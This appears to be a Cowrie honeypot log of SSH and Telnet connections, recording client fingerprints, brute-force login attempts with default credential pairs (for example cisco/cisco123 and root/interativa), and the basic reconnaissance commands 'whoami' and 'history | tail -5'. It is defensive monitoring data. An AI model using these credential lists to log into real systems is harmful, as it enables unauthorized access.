{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:52:06.056817Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.login.failed","username":"","password":"admin","message":"login attempt [/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T22:52:07.151916Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:52:08.234729Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abc123","message":"login attempt [cisco/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:52:09.317747Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abcd123","message":"login attempt [cisco/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:52:10.406412Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abcd1234","message":"login attempt [cisco/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T22:52:11.489465Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:52:12.584067Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38938,"dst_ip":"1.2.3.4","dst_port":23,"session":"d280f59c25b7","protocol":"telnet","message":"New connection: 212.227.235.229:38938 (1.2.3.4:23) [session: d280f59c25b7]","sensor":"my-vps","timestamp":"2025-08-28T22:52:48.162385Z"}
{"eventid":"cowrie.session.closed","duration":84.56202578544617,"message":"Connection lost after 84 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:53:19.693057Z","src_ip":"212.227.235.229","session":"b766306a30c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52722,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb1127212d9a","protocol":"ssh","message":"New connection: 212.227.125.160:52722 (1.2.3.4:22) [session: eb1127212d9a]","sensor":"my-vps","timestamp":"2025-08-28T22:53:31.986223Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:53:33.759046Z","src_ip":"212.227.125.160","session":"eb1127212d9a"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33910,"dst_ip":"1.2.3.4","dst_port":22,"session":"f85275e6ccf4","protocol":"ssh","message":"New connection: 201.148.180.50:33910 (1.2.3.4:22) [session: f85275e6ccf4]","sensor":"my-vps","timestamp":"2025-08-28T22:53:49.895017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:53:51.544021Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:53:51.545122Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.login.success","username":"root","password":"interativa","message":"login attempt [root/interativa] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:53:57.485081Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.login.failed","username":"\"","password":"\"","message":"login attempt [\"/\"] failed","sensor":"my-vps","timestamp":"2025-08-28T22:53:58.550305Z","src_ip":"212.227.235.229","session":"d280f59c25b7"}
{"eventid":"cowrie.session.closed","duration":70.38856601715088,"message":"Connection lost after 70 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:53:58.550842Z","src_ip":"212.227.235.229","session":"d280f59c25b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61992,"dst_ip":"1.2.3.4","dst_port":22,"session":"235b9a6de918","protocol":"ssh","message":"New connection: 212.227.235.229:61992 (1.2.3.4:22) [session: 235b9a6de918]","sensor":"my-vps","timestamp":"2025-08-28T22:54:02.374170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T22:54:03.182525Z","src_ip":"212.227.235.229","session":"235b9a6de918"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T22:54:04.434089Z","src_ip":"212.227.235.229","session":"235b9a6de918"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:54:06.547263Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T22:54:06.548087Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:54:07.864264Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.session.closed","duration":"18.0","message":"Connection lost after 18.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:54:07.865647Z","src_ip":"201.148.180.50","session":"f85275e6ccf4"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:54:11.880682Z","src_ip":"212.227.235.229","session":"235b9a6de918"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35665,"dst_ip":"1.2.3.4","dst_port":23,"session":"a11f891abfe2","protocol":"telnet","message":"New connection: 212.227.125.160:35665 (1.2.3.4:23) [session: a11f891abfe2]","sensor":"my-vps","timestamp":"2025-08-28T22:54:20.033035Z"}
{"eventid":"cowrie.session.closed","duration":31.4621479511261,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:54:51.495107Z","src_ip":"212.227.125.160","session":"a11f891abfe2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53480,"dst_ip":"1.2.3.4","dst_port":22,"session":"01de42c73a4b","protocol":"ssh","message":"New connection: 217.72.205.35:53480 (1.2.3.4:22) [session: 01de42c73a4b]","sensor":"my-vps","timestamp":"2025-08-28T22:56:40.149249Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:56:40.150303Z","src_ip":"217.72.205.35","session":"01de42c73a4b"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":40857,"dst_ip":"1.2.3.4","dst_port":22,"session":"083dadca37ea","protocol":"ssh","message":"New connection: 80.94.95.15:40857 (1.2.3.4:22) [session: 083dadca37ea]","sensor":"my-vps","timestamp":"2025-08-28T22:57:10.352089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:57:10.385650Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:57:10.454336Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna","message":"login attempt [alanna/alanna] failed","sensor":"my-vps","timestamp":"2025-08-28T22:57:10.769827Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna1","message":"login attempt [alanna/alanna1] failed","sensor":"my-vps","timestamp":"2025-08-28T22:57:11.837729Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna123","message":"login attempt [alanna/alanna123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:57:12.909307Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna1234","message":"login attempt [alanna/alanna1234] failed","sensor":"my-vps","timestamp":"2025-08-28T22:57:13.984279Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna12345","message":"login attempt [alanna/alanna12345] failed","sensor":"my-vps","timestamp":"2025-08-28T22:57:15.052776Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:57:16.120827Z","src_ip":"80.94.95.15","session":"083dadca37ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39612,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a0fb81ecb4a","protocol":"ssh","message":"New connection: 212.227.125.160:39612 (1.2.3.4:22) [session: 7a0fb81ecb4a]","sensor":"my-vps","timestamp":"2025-08-28T22:59:44.486814Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:59:46.265148Z","src_ip":"212.227.125.160","session":"7a0fb81ecb4a"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":44736,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bead6afb3b9","protocol":"ssh","message":"New connection: 201.148.180.50:44736 (1.2.3.4:22) [session: 7bead6afb3b9]","sensor":"my-vps","timestamp":"2025-08-28T22:59:58.517992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:59:59.928681Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:59:59.930084Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"85bb5b910169","protocol":"ssh","message":"New connection: 212.227.235.229:46710 (1.2.3.4:22) [session: 85bb5b910169]","sensor":"my-vps","timestamp":"2025-08-28T23:00:07.229699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:00:07.230869Z","src_ip":"212.227.235.229","session":"85bb5b910169"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:00:07.330071Z","src_ip":"212.227.235.229","session":"85bb5b910169"}
{"eventid":"cowrie.login.success","username":"root","password":"Sup","message":"login attempt [root/Sup] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:00:07.531893Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-28T23:00:07.780725Z","src_ip":"212.227.235.229","session":"85bb5b910169"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:00:09.071778Z","src_ip":"212.227.235.229","session":"85bb5b910169"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:00:10.737007Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T23:00:10.737991Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:00:12.519568Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.session.closed","duration":"14.0","message":"Connection lost after 14.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:00:12.521029Z","src_ip":"201.148.180.50","session":"7bead6afb3b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27404,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9f8b7887fb1","protocol":"ssh","message":"New connection: 212.227.235.229:27404 (1.2.3.4:22) [session: c9f8b7887fb1]","sensor":"my-vps","timestamp":"2025-08-28T23:00:14.720744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:00:14.722901Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47746,"dst_ip":"1.2.3.4","dst_port":23,"session":"efcb87cb43b5","protocol":"telnet","message":"New connection: 212.227.235.229:47746 (1.2.3.4:23) [session: efcb87cb43b5]","sensor":"my-vps","timestamp":"2025-08-28T23:00:14.847576Z"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:00:14.864950Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.login.failed","username":"","password":"admin","message":"login attempt [/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T23:00:15.680158Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:00:16.833694Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abc123","message":"login attempt [cisco/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:00:17.977535Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abcd123","message":"login attempt [cisco/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:00:19.123076Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abcd1234","message":"login attempt [cisco/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:00:20.268122Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:00:21.411013Z","src_ip":"212.227.235.229","session":"c9f8b7887fb1"}
{"eventid":"cowrie.session.closed","duration":31.308854818344116,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:00:46.156363Z","src_ip":"212.227.235.229","session":"efcb87cb43b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51880,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3c123e122ec","protocol":"ssh","message":"New connection: 212.227.125.160:51880 (1.2.3.4:22) [session: a3c123e122ec]","sensor":"my-vps","timestamp":"2025-08-28T23:01:00.383231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:01:00.383958Z","src_ip":"212.227.125.160","session":"a3c123e122ec"}
